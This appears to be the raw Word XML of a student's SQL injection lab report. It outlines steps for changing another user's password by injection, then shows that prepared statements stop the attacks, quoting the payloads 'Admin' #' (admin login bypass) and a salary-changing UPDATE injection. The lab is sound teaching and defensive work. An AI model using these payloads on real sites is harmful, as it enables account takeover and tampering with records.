    <w:p w14:paraId="0AE66709" w14:textId="0520811F" w:rsidR="0090392C" w:rsidRDefault="00CF0687" w:rsidP="00E050F0">
      <w:r>
        <w:t>Notice that if Alice wants to change Boby’s password to some other value other than her own password, she can: 1. Update her own password with the password she wants to set for Boby. 2. Find the hash value of the new password using an SQL injection attack on the login page. 3. Perform an SQL injection attack on the update profile page using the hash</w:t>
      </w:r>
      <w:r w:rsidR="00876B02">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">value of the new password. </w:t>
      </w:r>
      <w:r w:rsidR="00BE00E2">
        <w:t>4. Log in as Boby using the new password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C50A10F" w14:textId="7C3F9A1B" w:rsidR="0090392C" w:rsidRDefault="0090392C" w:rsidP="00E050F0"/>
    <w:p w14:paraId="029B9AED" w14:textId="13C42626" w:rsidR="008B3952" w:rsidRDefault="008B3952" w:rsidP="002D574A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D27813F" w14:textId="5D4BF786" w:rsidR="00EF29B1" w:rsidRPr="00EF29B1" w:rsidRDefault="00EF29B1" w:rsidP="002D574A">
      <w:r>
        <w:t xml:space="preserve">There were two categories of attacks in the previous tasks: 1. Attack on the login page. 2. Attack on the edit profile page. The vulnerable .php files are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">unsafe_home.php </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>unsafe_edit_backend.php</w:t>
      </w:r>
      <w:r>
        <w:t>, respectively. I chose Task 2.1 as the representative for the first type of attack and Task 3.1 as the representative for the second type of attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C866841" w14:textId="070F4732" w:rsidR="00225243" w:rsidRDefault="005F4150" w:rsidP="002D574A">
      <w:r>
        <w:t>The PHP code</w:t>
      </w:r>
      <w:r w:rsidR="002D6B63">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="002D6B63">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>unsafe_home.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before modifying:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037E2B1E" w14:textId="041DABCF" w:rsidR="005F4150" w:rsidRDefault="002D6B63" w:rsidP="002D574A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FAE3692" wp14:editId="44C9931D">
            <wp:extent cx="5943600" cy="21856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85670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0154E9BD" w14:textId="31979A5A" w:rsidR="002D6B63" w:rsidRDefault="002D6B63" w:rsidP="002D574A"/>
    <w:p w14:paraId="20094C5C" w14:textId="0DDE581F" w:rsidR="002D6B63" w:rsidRDefault="002D6B63" w:rsidP="002D574A">
      <w:r>
        <w:t xml:space="preserve">The PHP code in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">unsafe_home.php </w:t>
      </w:r>
      <w:r>
        <w:t>after modifying:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579B9712" w14:textId="5F11367C" w:rsidR="00786F29" w:rsidRDefault="002D6B63" w:rsidP="002D574A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C1A795E" wp14:editId="35061250">
            <wp:extent cx="5637475" cy="3879378"/>
            <wp:effectExtent l="0" t="0" r="190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4002" cy="3890751"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0F7B626C" w14:textId="64FE7896" w:rsidR="00786F29" w:rsidRDefault="00786F29" w:rsidP="002D574A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>An attack attempt (Same</w:t>
      </w:r>
      <w:r w:rsidR="00F97D5F">
        <w:t xml:space="preserve"> instruction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as Task 2.1) failed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B55971" w14:textId="285351E5" w:rsidR="00786F29" w:rsidRDefault="00786F29" w:rsidP="002D574A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AD7248D" wp14:editId="3123B889">
            <wp:extent cx="5943600" cy="16046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04645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F797D95" w14:textId="5FFBABF9" w:rsidR="00786F29" w:rsidRDefault="00786F29" w:rsidP="002D574A"/>
    <w:p w14:paraId="55015270" w14:textId="3948E534" w:rsidR="00786F29" w:rsidRDefault="00786F29" w:rsidP="002D574A">
      <w:r>
        <w:t>A normal</w:t>
      </w:r>
      <w:r w:rsidR="007831A9">
        <w:t xml:space="preserve"> admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> login succeeded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78167A6F" w14:textId="3C8DC46C" w:rsidR="007831A9" w:rsidRDefault="007831A9" w:rsidP="002D574A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A5F6360" wp14:editId="1D32C46A">
            <wp:extent cx="5943600" cy="35915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25B5367B" w14:textId="0173C7BE" w:rsidR="007831A9" w:rsidRDefault="007831A9" w:rsidP="002D574A"/>
    <w:p w14:paraId="51C273D4" w14:textId="2BE26183" w:rsidR="007831A9" w:rsidRDefault="007831A9" w:rsidP="002D574A"/>
    <w:p w14:paraId="26C3A732" w14:textId="3AF20361" w:rsidR="007831A9" w:rsidRDefault="007831A9" w:rsidP="002D574A"/>
    <w:p w14:paraId="71786E63" w14:textId="342FB71D" w:rsidR="007831A9" w:rsidRDefault="007831A9" w:rsidP="002D574A"/>
    <w:p w14:paraId="2590A3C9" w14:textId="38E81E1A" w:rsidR="007831A9" w:rsidRDefault="007831A9" w:rsidP="002D574A"/>
    <w:p w14:paraId="3BD79B3F" w14:textId="596B8485" w:rsidR="007831A9" w:rsidRDefault="007831A9" w:rsidP="002D574A"/>
    <w:p w14:paraId="0CC7CAD8" w14:textId="67BD82DA" w:rsidR="007831A9" w:rsidRDefault="007831A9" w:rsidP="002D574A"/>
    <w:p w14:paraId="6C51E2D9" w14:textId="5D59433F" w:rsidR="007831A9" w:rsidRDefault="007831A9" w:rsidP="002D574A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A normal user login succeeded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C7E74D" w14:textId="234060A2" w:rsidR="00786F29" w:rsidRDefault="007831A9" w:rsidP="00022AEA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72914D93" wp14:editId="1B799B1D">
            <wp:extent cx="4037990" cy="4586311"/>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1855" cy="4602058"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C7EA0F" w14:textId="4B6B3F07" w:rsidR="007062D9" w:rsidRDefault="007062D9" w:rsidP="00022AEA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="240C1158" w14:textId="12FACBA4" w:rsidR="00B770F1" w:rsidRDefault="00B770F1" w:rsidP="00B770F1">
      <w:r>
        <w:t xml:space="preserve">The PHP code in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>unsafe_</w:t>
      </w:r>
      <w:r w:rsidR="0098227D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>edit_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before modifying:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5DD9DD" w14:textId="2D09A330" w:rsidR="007062D9" w:rsidRDefault="00F97D5F" w:rsidP="007062D9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="709DE50B" wp14:editId="45DC3C7F">
            <wp:extent cx="5943600" cy="21704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70430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C6341D" w14:textId="7FCA27E7" w:rsidR="00F97D5F" w:rsidRDefault="00F97D5F" w:rsidP="007062D9"/>
    <w:p w14:paraId="0969D44A" w14:textId="44AD78F4" w:rsidR="00F97D5F" w:rsidRDefault="00F97D5F" w:rsidP="007062D9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The PHP code in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">unsafe_edit_backend.php </w:t>
      </w:r>
      <w:r>
        <w:t>after modifying:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E05FDC2" w14:textId="660A0CB6" w:rsidR="00F97D5F" w:rsidRDefault="00F97D5F" w:rsidP="007062D9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3186D1DF" wp14:editId="5AB17CB5">
            <wp:extent cx="5943600" cy="38423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42385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A967D9B" w14:textId="740196D5" w:rsidR="00F97D5F" w:rsidRDefault="00F97D5F" w:rsidP="007062D9"/>
    <w:p w14:paraId="7C0462C2" w14:textId="44D74CF4" w:rsidR="00F97D5F" w:rsidRDefault="00F97D5F" w:rsidP="007062D9">
      <w:r>
        <w:t>An attack attempt (</w:t>
      </w:r>
      <w:r w:rsidR="00F344EB">
        <w:t xml:space="preserve">Similar </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">instruction as </w:t>
      </w:r>
      <w:r w:rsidR="00F344EB">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:t>Task</w:t>
      </w:r>
      <w:r w:rsidR="00F344EB">
        <w:t xml:space="preserve"> 3.1)</w:t>
      </w:r>
      <w:r w:rsidR="00BD1EE7">
        <w:t xml:space="preserve"> failed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B005CF" w14:textId="318669D7" w:rsidR="00BD1EE7" w:rsidRDefault="00730153" w:rsidP="00730153">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EB58B99" wp14:editId="3CCCEB48">
            <wp:extent cx="4118458" cy="336560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60938" cy="3400321"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C972245" w14:textId="55619A55" w:rsidR="0069701F" w:rsidRDefault="0069701F" w:rsidP="0069701F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A normal profile update succeeded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6A8007" w14:textId="138A4F24" w:rsidR="0069701F" w:rsidRDefault="0069701F" w:rsidP="0069701F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="626E5E1C" wp14:editId="25E4AC4A">
            <wp:extent cx="4294022" cy="351779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5984" cy="3535786"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0ACD34" w14:textId="056F156B" w:rsidR="00A05895" w:rsidRDefault="00A05895" w:rsidP="0069701F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB9E51E" w14:textId="177B5A4D" w:rsidR="00A05895" w:rsidRPr="00BA36B9" w:rsidRDefault="00A05895" w:rsidP="00A05895">
      <w:r>
        <w:t xml:space="preserve">Observations: </w:t>
      </w:r>
      <w:r w:rsidR="007313E1">
        <w:t xml:space="preserve">First </w:t>
      </w:r>
      <w:r w:rsidR="00DF0D84">
        <w:t>I rewrot</w:t>
      </w:r>
      <w:r w:rsidR="007313E1">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00DF0D84">
        <w:t xml:space="preserve"> the query using the SQL prepare statement in </w:t>
      </w:r>
      <w:r w:rsidR="00DF0D84">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>unsafe_home.php</w:t>
      </w:r>
      <w:r w:rsidR="00DF0D84">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AE126E">
        <w:t>After th</w:t>
      </w:r>
      <w:r w:rsidR="00BA36B9">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00AE126E">
        <w:t xml:space="preserve"> modification, the attack in Task 2.1, where the attacker tries to log into the web application as the admin without knowing the admin’s password, failed. </w:t>
      </w:r>
      <w:r w:rsidR="00BA36B9">
        <w:t>In addition,</w:t>
      </w:r>
      <w:r w:rsidR="00AE126E">
        <w:t xml:space="preserve"> normal admin and user login activities can be successfully</w:t>
      </w:r>
      <w:r w:rsidR="00BA36B9">
        <w:t xml:space="preserve"> performed</w:t>
      </w:r>
      <w:r w:rsidR="00AE126E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BA36B9">
        <w:t xml:space="preserve">Second, I rewrote the query using the SQL prepare statement in </w:t>
      </w:r>
      <w:r w:rsidR="00BA36B9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>unsafe_edit_backend.php</w:t>
      </w:r>
      <w:r w:rsidR="00BA36B9">
        <w:t>. After the modification, the attack in Task 3.1, where Alice tries to modify her salary, failed. In addition, normal profile editing activities such as changing the nickname can be successfully performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0B3D31" w14:textId="5FFB7F27" w:rsidR="00A05895" w:rsidRPr="004F2B2F" w:rsidRDefault="00A05895" w:rsidP="00A05895">
      <w:r>
        <w:t>Explanations:</w:t>
      </w:r>
      <w:r w:rsidR="007C74B0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E27D0A">
        <w:t>At a high level</w:t>
      </w:r>
      <w:r w:rsidR="007C74B0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C5138F">
        <w:t xml:space="preserve">the countermeasure works because </w:t>
      </w:r>
      <w:r w:rsidR="00E27D0A">
        <w:t xml:space="preserve">a prepared statement will go through the compilation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E27D0A">
        <w:t>step, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E27D0A">
        <w:t xml:space="preserve"> be turned into a pre-compiled query with empty placeholders for data. Then user input data are plugged directly into the pre-compiled query and sent to the execution engine without going through the compilation step</w:t>
      </w:r>
      <w:r w:rsidR="007C74B0">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E27D0A">
        <w:t xml:space="preserve">Therefore, there is no way for the user input to be interpreted as executable code. And this countermeasure is an example of the idea that </w:t>
      </w:r>
      <w:r w:rsidR="001A477B">
        <w:t xml:space="preserve">we should </w:t>
      </w:r>
      <w:r w:rsidR="00E27D0A">
        <w:t xml:space="preserve">separate code from data. </w:t>
      </w:r>
      <w:r w:rsidR="007C74B0">
        <w:t xml:space="preserve">Specifically, after the modification in </w:t>
      </w:r>
      <w:r w:rsidR="007C74B0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>unsafe_home.php</w:t>
      </w:r>
      <w:r w:rsidR="007C74B0">
        <w:t>, whatever input provided in the USERNAME field in the login page will be treated as a string, not code which will get compiled or executed. Therefore, the attack string “</w:t>
      </w:r>
      <w:r w:rsidR="007C74B0">
        <w:t>Admin’ #</w:t>
      </w:r>
      <w:r w:rsidR="007C74B0">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00147407">
        <w:t xml:space="preserve">in Task 2.1 </w:t>
      </w:r>
      <w:r w:rsidR="007C74B0">
        <w:t xml:space="preserve">will be treated as a username. Since there is no match in the database, </w:t>
      </w:r>
      <w:r w:rsidR="004F2B2F">
        <w:t xml:space="preserve">the query returns an error “The account information you provide does not exist”. After the modification in </w:t>
      </w:r>
      <w:r w:rsidR="004F2B2F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>unsafe_edit_backend.php</w:t>
      </w:r>
      <w:r w:rsidR="004F2B2F">
        <w:t xml:space="preserve">, whatever input provided in the </w:t>
      </w:r>
      <w:r w:rsidR="00147407">
        <w:t xml:space="preserve">relevant fields (such as Nickname, email, phoneNumber) will be interpreted as pure text, not code which will get compiled or executed. Therefore, the attack string </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00147407">
        <w:t>“ ‘</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00147407">
        <w:t>, salary = ‘88888’ WHERE EID = ‘10000’ # “ in Task 3.1 will be treated as a nickname, and consequently Alice’s nickname, instead of Alice’s salary is modified to the content in the attack string.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A05895" w:rsidRPr="004F2B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70C26"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="347ABA6A"/>
    <w:lvl w:ilvl="0" w:tplc="99B438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19252E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0EE02706"/>
    <w:lvl w:ilvl="0" w:tplc="0170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3B5A8E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C862FA6C"/>
    <w:lvl w:ilvl="0" w:tplc="99B681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47F2B35"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="36A27008"/>
    <w:lvl w:ilvl="0" w:tplc="DC868E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1378F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41C23710"/>
    <w:lvl w:ilvl="0" w:tplc="6978A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712A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6896C4C8"/>
    <w:lvl w:ilvl="0" w:tplc="09964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064C74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="277A018E"/>
    <w:lvl w:ilvl="0" w:tplc="791A777A">
      <w:start w:val="17"/>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8193606"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF940F00"/>
    <w:lvl w:ilvl="0" w:tplc="6A2A3C9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1521077"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4EA07AE"/>
    <w:lvl w:ilvl="0" w:tplc="C964BB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52F765D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7BC24B1E"/>
    <w:lvl w:ilvl="0" w:tplc="F502EC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FB5DD9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7BC24B1E"/>
    <w:lvl w:ilvl="0" w:tplc="F502EC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A74DCD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F520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E57700"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EEF4B2DC"/>
    <w:lvl w:ilvl="0" w:tplc="1BE69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365526"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7B0029A0"/>
    <w:lvl w:ilvl="0" w:tplc="7C66D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E0F5512"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E36858C"/>
    <w:lvl w:ilvl="0" w:tplc="9DB6CD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2"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="10"/>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1C7"/>
    <w:rsid w:val="00014B4A"/>
    <w:rsid w:val="000162BD"/>
    <w:rsid w:val="00022AEA"/>
    <w:rsid w:val="00023F40"/>
    <w:rsid w:val="00032391"/>
    <w:rsid w:val="00036231"/>
    <w:rsid w:val="00054765"/>
    <w:rsid w:val="0005548F"/>
    <w:rsid w:val="0005697C"/>
    <w:rsid w:val="00056A99"/>
    <w:rsid w:val="00082A8D"/>
    <w:rsid w:val="00082B93"/>
    <w:rsid w:val="00097EBE"/>
    <w:rsid w:val="000A7356"/>
    <w:rsid w:val="000D30CD"/>
    <w:rsid w:val="000F6C52"/>
    <w:rsid w:val="0010042F"/>
    <w:rsid w:val="001109F9"/>
    <w:rsid w:val="001175D9"/>
    <w:rsid w:val="0013398F"/>
    <w:rsid w:val="00142636"/>
    <w:rsid w:val="00147407"/>
    <w:rsid w:val="00161BF1"/>
    <w:rsid w:val="00175B7F"/>
    <w:rsid w:val="0017765A"/>
    <w:rsid w:val="001A477B"/>
    <w:rsid w:val="001B3313"/>
    <w:rsid w:val="001B3BBA"/>
    <w:rsid w:val="001C18A4"/>
    <w:rsid w:val="001C55B4"/>
    <w:rsid w:val="001D7DAC"/>
    <w:rsid w:val="001E2A73"/>
    <w:rsid w:val="001F0DAF"/>
    <w:rsid w:val="001F1F09"/>
    <w:rsid w:val="001F2DF6"/>
    <w:rsid w:val="001F551D"/>
    <w:rsid w:val="001F7DE0"/>
    <w:rsid w:val="00204533"/>
    <w:rsid w:val="00211934"/>
    <w:rsid w:val="00213B98"/>
    <w:rsid w:val="002177FD"/>
    <w:rsid w:val="00225243"/>
    <w:rsid w:val="002257D3"/>
    <w:rsid w:val="0024083E"/>
    <w:rsid w:val="002417F1"/>
    <w:rsid w:val="00257CF3"/>
    <w:rsid w:val="00266CAA"/>
    <w:rsid w:val="002735A0"/>
    <w:rsid w:val="00295B45"/>
    <w:rsid w:val="002A1180"/>
    <w:rsid w:val="002D1CE4"/>
    <w:rsid w:val="002D574A"/>
    <w:rsid w:val="002D6B63"/>
    <w:rsid w:val="002E5EBC"/>
    <w:rsid w:val="002E63EF"/>
    <w:rsid w:val="00325D32"/>
    <w:rsid w:val="003265D6"/>
    <w:rsid w:val="00326C1A"/>
    <w:rsid w:val="003451AF"/>
    <w:rsid w:val="00353273"/>
    <w:rsid w:val="00355C14"/>
    <w:rsid w:val="00360441"/>
    <w:rsid w:val="00361EAB"/>
    <w:rsid w:val="00364A14"/>
    <w:rsid w:val="00371861"/>
    <w:rsid w:val="00395155"/>
    <w:rsid w:val="003A0FEB"/>
    <w:rsid w:val="003A6CA6"/>
    <w:rsid w:val="003B59FA"/>
    <w:rsid w:val="003B70B5"/>
    <w:rsid w:val="003D1433"/>
    <w:rsid w:val="003D2B24"/>
    <w:rsid w:val="00407D27"/>
    <w:rsid w:val="004149C5"/>
    <w:rsid w:val="00414A58"/>
    <w:rsid w:val="00424612"/>
    <w:rsid w:val="0042698D"/>
    <w:rsid w:val="004453BA"/>
    <w:rsid w:val="00455A4D"/>
    <w:rsid w:val="00472496"/>
    <w:rsid w:val="00473445"/>
    <w:rsid w:val="00476285"/>
    <w:rsid w:val="004800CF"/>
    <w:rsid w:val="00480D26"/>
    <w:rsid w:val="00492302"/>
    <w:rsid w:val="00494D3A"/>
    <w:rsid w:val="00496183"/>
    <w:rsid w:val="004A2F2A"/>
    <w:rsid w:val="004A3C85"/>
    <w:rsid w:val="004A7E0E"/>
    <w:rsid w:val="004D2F59"/>
    <w:rsid w:val="004D6946"/>
    <w:rsid w:val="004E35F8"/>
    <w:rsid w:val="004F1286"/>
    <w:rsid w:val="004F2B2F"/>
    <w:rsid w:val="00501643"/>
    <w:rsid w:val="005067C2"/>
    <w:rsid w:val="005067D1"/>
    <w:rsid w:val="0051259D"/>
    <w:rsid w:val="005431EC"/>
    <w:rsid w:val="00570810"/>
    <w:rsid w:val="005750D3"/>
    <w:rsid w:val="00583244"/>
    <w:rsid w:val="005853E9"/>
    <w:rsid w:val="00590B0F"/>
    <w:rsid w:val="00594D9B"/>
    <w:rsid w:val="005A6AD3"/>
    <w:rsid w:val="005C7F82"/>
    <w:rsid w:val="005D3F55"/>
    <w:rsid w:val="005D552D"/>
    <w:rsid w:val="005D66B9"/>
    <w:rsid w:val="005E428B"/>
    <w:rsid w:val="005F036B"/>
    <w:rsid w:val="005F38CA"/>
    <w:rsid w:val="005F4150"/>
    <w:rsid w:val="00605BB1"/>
    <w:rsid w:val="006151B7"/>
    <w:rsid w:val="006160A5"/>
    <w:rsid w:val="00621AE3"/>
    <w:rsid w:val="006316CF"/>
    <w:rsid w:val="0064227A"/>
    <w:rsid w:val="00642A60"/>
    <w:rsid w:val="0067498C"/>
    <w:rsid w:val="0067744C"/>
    <w:rsid w:val="00683812"/>
    <w:rsid w:val="00686ABB"/>
    <w:rsid w:val="00691FEC"/>
    <w:rsid w:val="0069701F"/>
    <w:rsid w:val="006D69E4"/>
    <w:rsid w:val="006F45D5"/>
    <w:rsid w:val="00700320"/>
    <w:rsid w:val="007032B4"/>
    <w:rsid w:val="00705570"/>
    <w:rsid w:val="007062D9"/>
    <w:rsid w:val="00706AEE"/>
    <w:rsid w:val="00707741"/>
    <w:rsid w:val="00720D54"/>
    <w:rsid w:val="007235DA"/>
    <w:rsid w:val="00730153"/>
    <w:rsid w:val="00730C6A"/>
    <w:rsid w:val="007313E1"/>
    <w:rsid w:val="00736319"/>
    <w:rsid w:val="007831A9"/>
    <w:rsid w:val="00786F29"/>
    <w:rsid w:val="007A4378"/>
    <w:rsid w:val="007A764D"/>
    <w:rsid w:val="007C613A"/>
    <w:rsid w:val="007C74B0"/>
    <w:rsid w:val="00802F50"/>
